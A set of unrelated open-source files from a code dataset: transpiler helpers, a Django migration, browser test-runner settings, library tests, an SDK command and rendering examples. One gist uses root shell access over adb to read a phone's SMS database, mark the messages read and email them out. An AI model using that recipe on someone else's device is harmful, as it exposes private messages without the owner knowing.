refs/heads/master
| 2021-01-22T15:43:29.890465
| 2016-03-07T03:42:19
| 2016-03-07T03:42:19
| 53,293,990
| 0
| 0
| null | 2016-03-07T03:48:09
| 2016-03-07T03:48:08
| null |
UTF-8
|
Python
| false
| false
| 2,630
|
py
|
from pseudo.pseudo_tree import Node, call, method_call, local, assignment, to_node
from pseudo.api_handlers import BizarreLeakingNode, NormalLeakingNode
def expand_map(receiver, func):
if func.type == 'lambda':
return Node(
'_py_list_comp',
sequence=receiver)
else:
return call('map', [func, receiver])
def expand_filter(receiver, func):
if func.type == 'lambda':
return Node(
'_py_list_comp')
else:
return call('filter', [func, receiver])
def expand_set_slice(receiver, from_=None, to=None, value=None, pseudo_type=None):
s = expand_slice(receiver, from_, to, pseudo_type)
return assignment(s, value)
def expand_slice(receiver, from_=None, to=None, pseudo_type=None):
if from_:
if to:
if from_.type == 'int' and from_.value == 0:
return Node('_py_slice_to', sequence=receiver, to=to, pseudo_type=pseudo_type)
else:
return Node('_py_slice', sequence=receiver, from_=from_, to=to, pseudo_type=pseudo_type)
else:
return Node('_py_slice_from', sequence=receiver, from_=from_, pseudo_type=pseudo_type)
elif to:
return Node('_py_slice_to', sequence=receiver, to=to, pseudo_type=pseudo_type)
else:
return None
class ReadFile(BizarreLeakingNode):
'''
transforms `io:read_file`
`io:read_file(name)`
to
`with open(name, 'r') as _f:
<target>/_file_contents = f.read()`
'''
def temp_name(self, target):
return '_file_contents'
# assign : as_assignment
# block-level: as_expression
# inside: as_assignment with temp_name as target
def as_expression(self):
return [Node(
'_py_with',
call=call('open', [self.args[0], to_node('r')], 'File'),
context='_f',
block=[method_call(local('_f', 'File'), 'read', [], 'String')],
pseudo_type='Void')], None
def as_assignment(self, target):
expression = self.as_expression()[0][0]
expression.block[0] = assignment(target, expression.block[0])
return [expression]
class WriteFile(NormalLeakingNode):
'''
transforms `io:write_file`
`io:write_file(name, stuff)`
`with open(name, 'w') as _f:
_f.write(stuff)`
'''
def as_expression(self):
return [], Node(
'_py_with',
call=call('open', [self.args[0], to_node('w')], 'File'),
context='_f',
block=[method_call(local('_f', 'File'), 'write', [self.args[1]], 'Void')],
pseudo_type='Void')
|
[
"alehander42@gmail.com"
] |
alehander42@gmail.com
|
2a208e38f3ee3b3d5ad2f906c8d4f09584af8142
|
3d7383bd777c9c49525ac7a0565b21ddea22f480
|
/draw/migrations/0003_canvas_in_use.py
|
285857b18f75cec4f092b92ad0eb9c1de1bb493c
|
[] |
no_license
|
eranfuchs1/draw-factory
|
34b785f97960adc7f4ddf105c355f83d0c83f7d7
|
064f481a5f42a72d6ca2945b145f688ca819ac39
|
refs/heads/main
| 2023-08-17T21:24:40.737542
| 2021-10-10T13:53:32
| 2021-10-10T13:53:32
| 411,957,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
# Generated by Django 3.2.7 on 2021-09-16 13:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('draw', '0002_auto_20210910_0639'),
]
operations = [
migrations.AddField(
model_name='canvas',
name='in_use',
field=models.BooleanField(null=True),
),
]
|
[
"xer@xer-labtop"
] |
xer@xer-labtop
|
9040a4631960319ec6148982d433cd13b8960be8
|
255e19ddc1bcde0d3d4fe70e01cec9bb724979c9
|
/all-gists/4975214/snippet.py
|
89b2ebfbf651f8646080afc7aa78e741eb01c122
|
[
"MIT"
] |
permissive
|
gistable/gistable
|
26c1e909928ec463026811f69b61619b62f14721
|
665d39a2bd82543d5196555f0801ef8fd4a3ee48
|
refs/heads/master
| 2023-02-17T21:33:55.558398
| 2023-02-11T18:20:10
| 2023-02-11T18:20:10
| 119,861,038
| 76
| 19
| null | 2020-07-26T03:14:55
| 2018-02-01T16:19:24
|
Python
|
UTF-8
|
Python
| false
| false
| 1,947
|
py
|
#!/usr/bin/env python3
# Joonas Kuorilehto 2013
# This script is Public Domain.
import csv
import subprocess
import pipes
from datetime import datetime
import smtplib
from email.mime.text import MIMEText
EMAIL = **************
ADB_BINARY = "adt-bundle-linux-x86_64/sdk/platform-tools/adb"
SMS_DB = "/data/data/com.android.providers.telephony/databases/mmssms.db"
def android_sql(sql_query):
cmd = 'sqlite3 -csv -header %s %s' % (SMS_DB, pipes.quote(sql_query))
shell_cmd = 'su -c {}'.format(pipes.quote(cmd))
p = subprocess.Popen([ADB_BINARY, 'shell', shell_cmd],
stdout=subprocess.PIPE, universal_newlines=True)
sqlite_out, sqlite_stderr = p.communicate()
reader = csv.DictReader(sqlite_out.split("\n"))
return reader
def get_unread_messages():
# Format message; get unread SMS messages from Android
result = android_sql("SELECT _id, address, date, body FROM sms WHERE read=0;")
message_ids = []
email_message = ""
for msg in result:
message_ids.append(msg['_id'])
date = datetime.fromtimestamp(int(int(msg['date'])/1000))
m = "{} [{}]\n {}\n\n".format(date, msg['address'], msg['body'])
email_message += m
return (message_ids, email_message)
def send_email(message_content, sender=EMAIL, to=EMAIL,
subject="Received SMS messages", charset="UTF-8"):
# Create a text/plain message
msg = MIMEText(message_content.encode(charset), _charset=charset)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = to
# Send the message via our own SMTP server.
s = smtplib.SMTP('localhost')
s.send_message(msg)
s.quit()
def main():
message_ids, email_message = get_unread_messages()
if len(message_ids) > 0:
send_email(email_message)
read_ids = ",".join(message_ids)
android_sql("UPDATE sms SET read=1 WHERE _id in ({});".format(read_ids))
if __name__ == '__main__':
main()
|
[
"gistshub@gmail.com"
] |
gistshub@gmail.com
|
2c9a8ded7947bcb9ce4a3f05b9e33107d4f561f4
|
297497957c531d81ba286bc91253fbbb78b4d8be
|
/testing/web-platform/tests/tools/wptrunner/wptrunner/browsers/chrome.py
|
c04e715a20e5eaa0635c562676c17e8f89f45cf7
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
marco-c/gecko-dev-comments-removed
|
7a9dd34045b07e6b22f0c636c0a836b9e639f9d3
|
61942784fb157763e65608e5a29b3729b0aa66fa
|
refs/heads/master
| 2023-08-09T18:55:25.895853
| 2023-08-01T00:40:39
| 2023-08-01T00:40:39
| 211,297,481
| 0
| 0
|
NOASSERTION
| 2019-09-29T01:27:49
| 2019-09-27T10:44:24
|
C++
|
UTF-8
|
Python
| false
| false
| 5,676
|
py
|
from . import chrome_spki_certs
from .base import WebDriverBrowser, require_arg
from .base import NullBrowser
from .base import get_timeout_multiplier
from .base import cmd_arg
from ..executors import executor_kwargs as base_executor_kwargs
from ..executors.executorwebdriver import WebDriverCrashtestExecutor
from ..executors.base import WdspecExecutor
from ..executors.executorchrome import (
ChromeDriverPrintRefTestExecutor,
ChromeDriverRefTestExecutor,
ChromeDriverTestharnessExecutor,
)
__wptrunner__ = {"product": "chrome",
"check_args": "check_args",
"browser": "ChromeBrowser",
"executor": {"testharness": "ChromeDriverTestharnessExecutor",
"reftest": "ChromeDriverRefTestExecutor",
"print-reftest": "ChromeDriverPrintRefTestExecutor",
"wdspec": "WdspecExecutor",
"crashtest": "WebDriverCrashtestExecutor"},
"browser_kwargs": "browser_kwargs",
"executor_kwargs": "executor_kwargs",
"env_extras": "env_extras",
"env_options": "env_options",
"update_properties": "update_properties",
"timeout_multiplier": "get_timeout_multiplier",}
def check_args(**kwargs):
require_arg(kwargs, "webdriver_binary")
def browser_kwargs(logger, test_type, run_info_data, config, **kwargs):
return {"binary": kwargs["binary"],
"webdriver_binary": kwargs["webdriver_binary"],
"webdriver_args": kwargs.get("webdriver_args")}
def executor_kwargs(logger, test_type, test_environment, run_info_data,
**kwargs):
sanitizer_enabled = kwargs.get("sanitizer_enabled")
if sanitizer_enabled:
test_type = "crashtest"
executor_kwargs = base_executor_kwargs(test_type, test_environment, run_info_data,
**kwargs)
executor_kwargs["close_after_done"] = True
executor_kwargs["sanitizer_enabled"] = sanitizer_enabled
executor_kwargs["reuse_window"] = kwargs.get("reuse_window", False)
capabilities = {
"goog:chromeOptions": {
"prefs": {
"profile": {
"default_content_setting_values": {
"popups": 1
}
}
},
"excludeSwitches": ["enable-automation"],
"w3c": True
}
}
chrome_options = capabilities["goog:chromeOptions"]
if kwargs["binary"] is not None:
chrome_options["binary"] = kwargs["binary"]
chrome_options["args"] = []
chrome_options["args"].append("--ignore-certificate-errors-spki-list=%s" %
','.join(chrome_spki_certs.IGNORE_CERTIFICATE_ERRORS_SPKI_LIST))
chrome_options["args"].append("--autoplay-policy=no-user-gesture-required")
chrome_options["args"].append("--use-fake-device-for-media-stream")
chrome_options["args"].append("--use-fake-ui-for-media-stream")
chrome_options["args"].append("--use-fake-ui-for-fedcm")
chrome_options["args"].append("--short-reporting-delay")
chrome_options["args"].append("--host-resolver-rules=MAP nonexistent.*.test ~NOTFOUND, MAP *.test 127.0.0.1")
chrome_options["args"].append("--enable-features=SecurePaymentConfirmationBrowser")
address_space_overrides_ports = [
("http-private", "private"),
("http-public", "public"),
("https-private", "private"),
("https-public", "public"),
]
address_space_overrides_arg = ",".join(
f"127.0.0.1:{port_number}={address_space}"
for port_name, address_space in address_space_overrides_ports
for port_number in test_environment.config.ports.get(port_name, [])
)
if address_space_overrides_arg:
chrome_options["args"].append(
"--ip-address-space-overrides=" + address_space_overrides_arg)
if kwargs["enable_mojojs"]:
chrome_options["args"].append("--enable-blink-features=MojoJS,MojoJSTest")
if kwargs["enable_swiftshader"]:
chrome_options["args"].extend(["--use-gl=angle", "--use-angle=swiftshader"])
if kwargs["enable_experimental"]:
chrome_options["args"].extend(["--enable-experimental-web-platform-features"])
if kwargs["binary_args"] is not None:
chrome_options["args"].extend(kwargs["binary_args"])
if ((kwargs["headless"] or test_type == "print-reftest") and
"--headless" not in chrome_options["args"]):
chrome_options["args"].append("--headless")
webtranport_h3_port = test_environment.config.ports.get('webtransport-h3')
if webtranport_h3_port is not None:
chrome_options["args"].append(
f"--origin-to-force-quic-on=web-platform.test:{webtranport_h3_port[0]}")
if test_type == "wdspec":
executor_kwargs["binary_args"] = chrome_options["args"]
executor_kwargs["capabilities"] = capabilities
return executor_kwargs
def env_extras(**kwargs):
return []
def env_options():
return {"server_host": "127.0.0.1"}
def update_properties():
return (["debug", "os", "processor"], {"os": ["version"], "processor": ["bits"]})
class ChromeBrowser(WebDriverBrowser):
def make_command(self):
return [self.webdriver_binary,
cmd_arg("port", str(self.port)),
cmd_arg("url-base", self.base_path),
cmd_arg("enable-chrome-logs")] + self.webdriver_args
|
[
"mcastelluccio@mozilla.com"
] |
mcastelluccio@mozilla.com
|
b4b41d922e148e8957787f9ba6595f80af7ff5cd
|
f83ef53177180ebfeb5a3e230aa29794f52ce1fc
|
/opencv/opencv-3.4.2/modules/python/test/test_algorithm_rw.py
|
c925a99e7b378e4a2de119a09516b8791426e911
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
msrLi/portingSources
|
fe7528b3fd08eed4a1b41383c88ee5c09c2294ef
|
57d561730ab27804a3172b33807f2bffbc9e52ae
|
refs/heads/master
| 2021-07-08T01:22:29.604203
| 2019-07-10T13:07:06
| 2019-07-10T13:07:06
| 196,183,165
| 2
| 1
|
Apache-2.0
| 2020-10-13T14:30:53
| 2019-07-10T10:16:46
| null |
UTF-8
|
Python
| false
| false
| 945
|
py
|
#!/usr/bin/env python
"""Algorithm serializaion test."""
import tempfile
import os
import cv2 as cv
from tests_common import NewOpenCVTests
class algorithm_rw_test(NewOpenCVTests):
def test_algorithm_rw(self):
fd, fname = tempfile.mkstemp(prefix="opencv_python_algorithm_", suffix=".yml")
os.close(fd)
# some arbitrary non-default parameters
gold = cv.AKAZE_create(descriptor_size=1, descriptor_channels=2, nOctaves=3, threshold=4.0)
gold.write(cv.FileStorage(fname, cv.FILE_STORAGE_WRITE), "AKAZE")
fs = cv.FileStorage(fname, cv.FILE_STORAGE_READ)
algorithm = cv.AKAZE_create()
algorithm.read(fs.getNode("AKAZE"))
self.assertEqual(algorithm.getDescriptorSize(), 1)
self.assertEqual(algorithm.getDescriptorChannels(), 2)
self.assertEqual(algorithm.getNOctaves(), 3)
self.assertEqual(algorithm.getThreshold(), 4.0)
os.remove(fname)
|
[
"lihuibin705@163.com"
] |
lihuibin705@163.com
|
0372fae3ea1b5eb2527a825a9ca4ed488c4356f6
|
dcce56815dca2b18039e392053376636505ce672
|
/dumpscripts/urllib_parse_parse_qs.py
|
ac161429c77b20833f8c030beec791aacc03a8ed
|
[] |
no_license
|
robertopauletto/PyMOTW-it_3.0
|
28ff05d8aeccd61ade7d4107a971d9d2576fb579
|
c725df4a2aa2e799a969e90c64898f08b7eaad7d
|
refs/heads/master
| 2021-01-20T18:51:30.512327
| 2020-01-09T19:30:14
| 2020-01-09T19:30:14
| 63,536,756
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 184
|
py
|
# urllib_parse_parse_qs.py
from urllib.parse import parse_qs, parse_qsl
encoded = 'foo=foo1&foo=foo2'
print('parse_qs :', parse_qs(encoded))
print('parse_qsl:', parse_qsl(encoded))
|
[
"roberto.pauletto@gmail.com"
] |
roberto.pauletto@gmail.com
|
51240397ecfcb413842739d74156a0b5203fe35a
|
0e478f3d8b6c323c093455428c9094c45de13bac
|
/src/OTLMOW/PostenMapping/Model/Post050403123.py
|
d2a98778acbe6ecbe359b1c4d49180ede0abb679
|
[
"MIT"
] |
permissive
|
davidvlaminck/OTLMOW
|
c6eae90b2cab8a741271002cde454427ca8b75ba
|
48f8c357c475da1d2a1bc7820556843d4b37838d
|
refs/heads/main
| 2023-01-12T05:08:40.442734
| 2023-01-10T15:26:39
| 2023-01-10T15:26:39
| 432,681,113
| 3
| 1
|
MIT
| 2022-06-20T20:36:00
| 2021-11-28T10:28:24
|
Python
|
UTF-8
|
Python
| false
| false
| 3,021
|
py
|
# coding=utf-8
from OTLMOW.PostenMapping.StandaardPost import StandaardPost
from OTLMOW.PostenMapping.StandaardPostMapping import StandaardPostMapping
# Generated with PostenCreator. To modify: extend, do not edit
class Post050403123(StandaardPost):
def __init__(self):
super().__init__(
nummer='0504.03123',
beschrijving='Steenslagfundering met continue korrelverdeling zonder toevoegsels, type I volgens 5-4.3, dikte 23 cm',
meetstaateenheid='M2',
mappings=[StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw.type',
dotnotation='type',
defaultWaarde='steenslag-met-continue-korrelverdeling-zonder-toevoegsel---type-I',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0504.03123')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Laag.laagRol',
dotnotation='laagRol',
defaultWaarde='fundering',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0504.03123')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#LaagDikte.dikte',
dotnotation='dikte',
defaultWaarde='23',
range='',
usagenote='cm^^cdt:ucumunit',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0504.03123')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Onderbouw',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Laag.oppervlakte',
dotnotation='oppervlakte',
defaultWaarde='',
range='',
usagenote='m2^^cdt:ucumunit',
isMeetstaatAttr=1,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0504.03123')])
|
[
"david.vlaminck@mow.vlaanderen.be"
] |
david.vlaminck@mow.vlaanderen.be
|
eb8d813a61a828c9efb6c8ec52af1b6ef4a5c794
|
91824d746654fe12881b4fc3b55c553aae0d22ac
|
/py/redundant-connection.py
|
ab5fad839fdb7996e843187b4f2991bc9032bb7b
|
[
"Apache-2.0"
] |
permissive
|
ckclark/leetcode
|
a1a173c67a36a3256b198f853fcd3d15aa5abbb7
|
844c6f18d06dcb397db76436e5f4b8ddcb1beddc
|
refs/heads/master
| 2021-01-15T08:14:43.368516
| 2020-02-14T07:25:05
| 2020-02-14T07:30:10
| 42,386,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
from collections import defaultdict
class Solution(object):
def findRedundantConnection(self, edges):
"""
:type edges: List[List[int]]
:rtype: List[int]
"""
visited = set()
parent = dict()
neighbors = defaultdict(list)
edge_idx = {tuple(sorted(e)): i for i, e in enumerate(edges)}
def cycle_edge(v1, v2):
e = tuple(sorted([v1, v2]))
max_idx, ans = edge_idx[e], e
v = v1
while v != v2:
e = tuple(sorted([v, parent[v]]))
if edge_idx[e] > max_idx:
max_idx = edge_idx[e]
ans = e
v = parent[v]
return list(ans)
def dfs(cur):
visited.add(cur)
for neighbor in neighbors[cur]:
if neighbor != parent[cur]:
if neighbor in visited:
yield cycle_edge(cur, neighbor)
else:
parent[neighbor] = cur
for x in dfs(neighbor):
yield x
for v1, v2 in edges:
neighbors[v1].append(v2)
neighbors[v2].append(v1)
parent[v1] = -1
return next(dfs(v1))
|
[
"clark.ck@gmail.com"
] |
clark.ck@gmail.com
|
43c894cedddac6fcbb06773d61b19cb93d4bf03c
|
2a8c18a9fd129337c043fd2363b48450f0c3185f
|
/test/gst-msdk/transcode/vc1.py
|
7e4155599e586463311c20b1dd91b128b51208b1
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
intel/vaapi-fits
|
9641af9d684a7643c18c7f95e9411b807b2a3ae1
|
a60be1833b408fee665d0f717a10804ac2fb8ed4
|
refs/heads/master
| 2023-09-03T01:15:21.981271
| 2023-08-25T18:33:26
| 2023-09-01T14:05:15
| 164,735,279
| 26
| 34
|
BSD-3-Clause
| 2023-09-14T11:10:49
| 2019-01-08T21:24:18
|
Python
|
UTF-8
|
Python
| false
| false
| 515
|
py
|
##
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ....lib.gstreamer.msdk.util import *
from ....lib.gstreamer.msdk.transcoder import TranscoderTest
spec = load_test_spec("vc1", "transcode")
class default(TranscoderTest):
@slash.parametrize(("case"), sorted_by_resolution(spec))
def test(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
case = case,
codec = "vc1",
)
self.transcode()
|
[
"ullysses.a.eoff@intel.com"
] |
ullysses.a.eoff@intel.com
|
7c0227292f7dfe64bf7c5b85a67c03683090503b
|
b15d2787a1eeb56dfa700480364337216d2b1eb9
|
/samples/cli/accelbyte_py_sdk_cli/platform/_create_user_payment_order.py
|
c36e358769fc38c7aedebc890ffc637ee047d686
|
[
"MIT"
] |
permissive
|
AccelByte/accelbyte-python-sdk
|
dedf3b8a592beef5fcf86b4245678ee3277f953d
|
539c617c7e6938892fa49f95585b2a45c97a59e0
|
refs/heads/main
| 2023-08-24T14:38:04.370340
| 2023-08-22T01:08:03
| 2023-08-22T01:08:03
| 410,735,805
| 2
| 1
|
MIT
| 2022-08-02T03:54:11
| 2021-09-27T04:00:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,810
|
py
|
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template_file: python-cli-command.j2
# AGS Platform Service (4.32.1)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
import json
import yaml
from typing import Optional
import click
from .._utils import login_as as login_as_internal
from .._utils import to_dict
from accelbyte_py_sdk.api.platform import (
create_user_payment_order as create_user_payment_order_internal,
)
from accelbyte_py_sdk.api.platform.models import ErrorEntity
from accelbyte_py_sdk.api.platform.models import PaymentOrderCreate
from accelbyte_py_sdk.api.platform.models import PaymentOrderInfo
from accelbyte_py_sdk.api.platform.models import ValidationErrorEntity
@click.command()
@click.argument("user_id", type=str)
@click.option("--body", "body", type=str)
@click.option("--namespace", type=str)
@click.option("--login_as", type=click.Choice(["client", "user"], case_sensitive=False))
@click.option("--login_with_auth", type=str)
@click.option("--doc", type=bool)
def create_user_payment_order(
user_id: str,
body: Optional[str] = None,
namespace: Optional[str] = None,
login_as: Optional[str] = None,
login_with_auth: Optional[str] = None,
doc: Optional[bool] = None,
):
if doc:
click.echo(create_user_payment_order_internal.__doc__)
return
x_additional_headers = None
if login_with_auth:
x_additional_headers = {"Authorization": login_with_auth}
else:
login_as_internal(login_as)
if body is not None:
try:
body_json = json.loads(body)
body = PaymentOrderCreate.create_from_dict(body_json)
except ValueError as e:
raise Exception(f"Invalid JSON for 'body'. {str(e)}") from e
result, error = create_user_payment_order_internal(
user_id=user_id,
body=body,
namespace=namespace,
x_additional_headers=x_additional_headers,
)
if error:
raise Exception(f"createUserPaymentOrder failed: {str(error)}")
click.echo(yaml.safe_dump(to_dict(result), sort_keys=False))
create_user_payment_order.operation_id = "createUserPaymentOrder"
create_user_payment_order.is_deprecated = False
|
[
"elmernocon@gmail.com"
] |
elmernocon@gmail.com
|
b08feec8aa0ebf1c8e0ffc71a57504ca08bfc238
|
b550eda62179ffd8e49a59df7f8a30163140204f
|
/backend/openshift/services/data/data/dependencies/xml_templates.py
|
c3e9ee5b62ab44ae3a4c242f93e504762286d3bc
|
[
"Apache-2.0"
] |
permissive
|
bgoesswe/openeo-repeatability
|
6222fb235b70fda9da998b63fec92c0e5ac07169
|
087b9965e710d16cd6f29cb25e2cb94e443c2b30
|
refs/heads/master
| 2022-12-11T03:43:35.365574
| 2018-08-07T20:02:02
| 2018-08-07T20:02:02
| 139,158,921
| 0
| 1
| null | 2022-12-08T02:15:15
| 2018-06-29T14:27:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,291
|
py
|
xml_base = (
"<?xml version='1.0' encoding='ISO-8859-1' standalone='no'?>"
"<csw:GetRecords "
"xmlns:csw='http://www.opengis.net/cat/csw/2.0.2' "
"xmlns:ogc='http://www.opengis.net/ogc' "
"service='CSW' "
"version='2.0.2' "
"resultType='results' "
"startPosition='{start_position}' "
"maxRecords='1000' "
"outputFormat='application/json' "
"outputSchema='{output_schema}' "
"xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' "
"xsi:schemaLocation='http://www.opengis.net/cat/csw/2.0.2 http://schemas.opengis.net/csw/2.0.2/CSW-discovery.xsd' "
"xmlns:gml='http://www.opengis.net/gml' "
"xmlns:gmd='http://www.isotc211.org/2005/gmd' "
"xmlns:apiso='http://www.opengis.net/cat/csw/apiso/1.0'>"
"<csw:Query typeNames='csw:Record'>"
"<csw:ElementSetName>full</csw:ElementSetName>"
"<csw:Constraint version='1.1.0'>"
"<ogc:Filter>"
"{children}"
"</ogc:Filter>"
"</csw:Constraint>"
"<ogc:SortBy>"
"<ogc:SortProperty>"
"<ogc:PropertyName>dc:date</ogc:PropertyName>"
"<ogc:SortOrder>ASC</ogc:SortOrder>"
"</ogc:SortProperty>"
"</ogc:SortBy>"
"</csw:Query>"
"</csw:GetRecords>")
xml_and = (
"<ogc:And>"
"{children}"
"</ogc:And>")
xml_series = (
"<ogc:PropertyIsEqualTo>"
"<ogc:PropertyName>apiso:Type</ogc:PropertyName>"
"<ogc:Literal>series</ogc:Literal>"
"</ogc:PropertyIsEqualTo>")
xml_product = (
"<ogc:PropertyIsEqualTo>"
"<ogc:PropertyName>{property}</ogc:PropertyName>"
"<ogc:Literal>{product}</ogc:Literal>"
"</ogc:PropertyIsEqualTo>")
xml_begin = (
"<ogc:PropertyIsGreaterThanOrEqualTo>"
"<ogc:PropertyName>apiso:TempExtent_begin</ogc:PropertyName>"
"<ogc:Literal>{start}</ogc:Literal>"
"</ogc:PropertyIsGreaterThanOrEqualTo>")
xml_end = (
"<ogc:PropertyIsLessThanOrEqualTo>"
"<ogc:PropertyName>apiso:TempExtent_end</ogc:PropertyName>"
"<ogc:Literal>{end}</ogc:Literal>"
"</ogc:PropertyIsLessThanOrEqualTo>")
xml_bbox = (
"<ogc:BBOX>"
"<ogc:PropertyName>ows:BoundingBox</ogc:PropertyName>"
"<gml:Envelope>"
"<gml:lowerCorner>{bbox.x1} {bbox.y1}</gml:lowerCorner>"
"<gml:upperCorner>{bbox.x2} {bbox.y2}</gml:upperCorner>"
"</gml:Envelope>"
"</ogc:BBOX>")
|
[
"bernhard.goesswein@geo.tuwien.ac.at"
] |
bernhard.goesswein@geo.tuwien.ac.at
|
8630e43fdef88303ac3890a023c2a9d9ba234303
|
f062af64ce156719203b79de9c2502b265af27de
|
/tensorflow_datasets/image_classification/imagenet2012_fewshot.py
|
8ceb0f003db906d5f9ee337a88de732cb52626d6
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/datasets
|
d0c58f3db7ce06347671558b9e5a41e12e6913ce
|
41ae3cf1439711ed2f50f99caa0e6702082e6d37
|
refs/heads/master
| 2023-08-31T03:23:16.581638
| 2023-08-30T17:25:34
| 2023-08-30T17:29:38
| 148,221,325
| 4,224
| 1,738
|
Apache-2.0
| 2023-09-14T14:04:22
| 2018-09-10T21:27:22
|
Python
|
UTF-8
|
Python
| false
| false
| 938
|
py
|
# coding=utf-8
# Copyright 2023 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dataset definition for imagenet2012_fewshot.
DEPRECATED!
If you want to use the Imagenet2012Fewshot dataset builder class, use:
tfds.builder_cls('imagenet2012_fewshot')
"""
from tensorflow_datasets.core import lazy_builder_import
Imagenet2012Fewshot = lazy_builder_import.LazyBuilderImport(
'imagenet2012_fewshot'
)
|
[
"no-reply@google.com"
] |
no-reply@google.com
|
c6f1362845b8706526e3c4be24be5c5c66831c22
|
2a0865c583a12c66fdd1e7a62535b3e35482d37b
|
/CarAI/joshua_work/old/tutorial/Code/04_code/Lights/src/Application.py
|
cd596a8094bb301022e4217d73fa06d9531e57e5
|
[] |
no_license
|
MyAusweis/UnrealAI
|
fe4a6df2859143cd4ca66a063016fc4d22d62bb7
|
9e5ad6b93df7ecf2293de10d41f09969c42404b3
|
refs/heads/master
| 2022-02-11T12:43:52.129313
| 2018-07-01T22:08:23
| 2018-07-01T22:08:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,520
|
py
|
from direct.showbase.ShowBase import ShowBase
from direct.actor.Actor import Actor
from panda3d.core import *
class Application(ShowBase):
def __init__(self):
ShowBase.__init__(self)
self.panda = Actor("panda", {"walk": "panda-walk"})
self.panda.reparentTo(render)
self.panda.loop("walk")
cm = CardMaker("plane")
cm.setFrame(-10, 10, -10, 10)
plane = render.attachNewNode(cm.generate())
plane.setP(270)
self.cam.setPos(0, -40, 6)
ambLight = AmbientLight("ambient")
ambLight.setColor(Vec4(0.2, 0.1, 0.1, 1.0))
ambNode = render.attachNewNode(ambLight)
render.setLight(ambNode)
dirLight = DirectionalLight("directional")
dirLight.setColor(Vec4(0.1, 0.4, 0.1, 1.0))
dirNode = render.attachNewNode(dirLight)
dirNode.setHpr(60, 0, 90)
render.setLight(dirNode)
pntLight = PointLight("point")
pntLight.setColor(Vec4(0.8, 0.8, 0.8, 1.0))
pntNode = render.attachNewNode(pntLight)
pntNode.setPos(0, 0, 15)
self.panda.setLight(pntNode)
sptLight = Spotlight("spot")
sptLens = PerspectiveLens()
sptLight.setLens(sptLens)
sptLight.setColor(Vec4(1.0, 0.0, 0.0, 1.0))
sptLight.setShadowCaster(True)
sptNode = render.attachNewNode(sptLight)
sptNode.setPos(-10, -10, 20)
sptNode.lookAt(self.panda)
render.setLight(sptNode)
render.setShaderAuto()
|
[
"joshualevy44@berkeley.edu"
] |
joshualevy44@berkeley.edu
|
79dbda9c85e5d684dfa0a8d30200484398c05def
|
c83473c2f9b63429f40e8a4806ab49305815c81d
|
/feature_cross_script/feature_cross_run.py
|
ba39e49faa933a1e1c10cfa9a816e7e26ae97afd
|
[] |
no_license
|
pelinbalci/machinelearning
|
f8f84cda07a2ae87f23598188a6c148badb6e15f
|
33e9786ea49f114c24c02dbf24e33434d0421f65
|
refs/heads/master
| 2022-11-15T19:55:46.633659
| 2020-07-05T18:38:54
| 2020-07-05T18:38:54
| 273,779,533
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,798
|
py
|
from feature_cross_script.feature_cross import import_dataset, scale_label, shuffle_df, create_model, train_model, \
plot_the_loss_curve, create_feature_columns, create_feature_layer, create_bucket_features, create_crossed_feature,\
evaluate_model
from parameters import learning_rate, epochs, batch_size, label_name, resolution_in_degrees
